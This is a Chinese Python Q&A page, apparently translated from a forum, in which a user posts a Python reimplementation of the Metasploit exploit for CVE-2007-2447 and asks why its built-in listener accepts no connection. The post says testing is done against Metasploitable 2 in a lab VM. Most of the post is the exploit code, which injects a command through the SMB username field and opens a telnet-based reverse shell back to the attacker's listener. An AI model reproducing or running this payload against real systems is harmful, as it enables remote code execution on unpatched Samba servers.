Python中文网 - 问答频道, 解决您学习工作中的Python难题和Bug
Python常见问题
最近,我为CVE2007-2447创建了Metasploit模块的Python实现,我在网上找到了一个基本脚本,我学习了其中的一些内容,然后决定将侦听器构建到脚本中,这样我就不必在Python脚本旁边运行Netcat了。你知道吗
import sys
import time
import socket
import threading
from smb.SMBConnection import SMBConnection
def exploit(rHost, rPort, lHost, lPort):
print("[+] " + rHost, rPort, lHost, lPort)
payload = 'sh -c(sleep 4535 | telnet ' + lHost + " " + lPort + ' | while : ; do sh && break; done 2>&1 | telnet ' + lHost + " " + lPort + ' >/dev/null 2>&1 &)'
username = "/=`nohup " + payload + "`"
password = ""
print("[+] " + username + password)
s = SMBConnection(username, password, "", "", use_ntlm_v2 = True)
#try:
s.connect(rHost, int(rPort), timeout=1)
print("[+] Payload sent!")
handler(shell)
#except Exception as e:
# print(e)
# print("[*] Fail!")
def handler(shell):
(conn, address) = shell.accept()
print("[+] Connected to " + address)
commandSender(conn)
conn.close()
def commandSender(conn):
shell_status = True
shell_recv_thread = threading.Thread(target=recvStream, args=(conn, shell_status))
shell_recv_thread.start()
command = ''
while shell_status == True:
command = input()
if command == "exit":
shell_status = False
conn.close()
shell_recv_thread.join()
sys.exit(0)
conn.send(bytes(command + "\n", "utf-8"))
def recvStream(conn, addr, status):
status = True
while status == True:
try:
print(conn.recv(1024))
except conn.timeout:
pass
except Exception as e:
print(e)
print("[*] Failed Shell Interaction...")
if __name__ == '__main__':
print("[*] CVE2007-2447")
if len(sys.argv) != 5:
print("[-] usage: <RHOST> <RPORT> <LHOST> <LPORT>")
else:
print("[+] Exectuting...")
shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shell.bind((sys.argv[3], int(sys.argv[4])))
shell.listen(10)
rHost = sys.argv[1]
rPort = sys.argv[2]
lHost = sys.argv[3]
lPort = sys.argv[4]
exploit(rHost, rPort, lHost, lPort)
如您所见,此攻击的脚本相当简单,由于未初始化的用户输入,攻击者可以在用户名字段中向受影响的设备发送命令。我在运行脚本时检查了Netstat&我可以看到我的机器肯定在侦听我为lPort指定的端口,但是由于某些原因,套接字似乎无法接受连接。为了测试代码,我在一个Ubuntu虚拟机中运行它,而这个虚拟机是在同一子网上的一个单独的虚拟机中运行的Metasploitable 2。你知道吗
Tags: import脚本truedefstatussyssocketshell
热门问题
- 文本导入时标题行中的特殊字符
- 文本小部件:在没有输入时更新并在循环后保持空闲
- 文本小部件tkin
- 文本小部件tkinter中的标签更改或文本外观更改是否有撤消功能?
- 文本小部件tkinter复制图像选项
- 文本小部件上的Python Tkinter ttk滚动条未缩放
- 文本小部件上的滚动条可能需要根据制表符ord显示前进行滚动
- 文本小部件不显示lis中的内容
- 文本小部件不显示Unicode字符
- 文本小部件中写入的行间距
- 文本小部件中的文本作为变量
- 文本小部件中的滚动条仅显示在底部
- 文本小部件中的选项卡键空间计数
- 文本小部件作为Lis
- 文本小部件在主框架中扩展列宽
- 文本小部件未使用删除功能清除
- 文本小部件滚动动画(Tkinter、Python)
- 文本居中。格式正确吗?
- 文本差分算法
- 文本已知时音频文件中的单词索引
热门文章
- Python覆盖写入文件
- 怎样创建一个 Python 列表?
- Python3 List append()方法使用
- 派森语言
- Python List pop()方法
- Python Django Web典型模块开发实战
- Python input() 函数
- Python3 列表(list) clear()方法
- Python游戏编程入门
- 如何创建一个空的set?
- python如何定义(创建)一个字符串
- Python标准库 [The Python Standard Library by Ex
- Python网络数据爬取及分析从入门到精通(分析篇)
- Python3 for 循环语句
- Python List insert() 方法
- Python 字典(Dictionary) update()方法
- Python编程无师自通 专业程序员的养成
- Python3 List count()方法
- Python 网络爬虫实战 [Web Crawler With Python]
- Python Cookbook(第2版)中文版
目前没有回答
相关问题 更多 >
编程相关推荐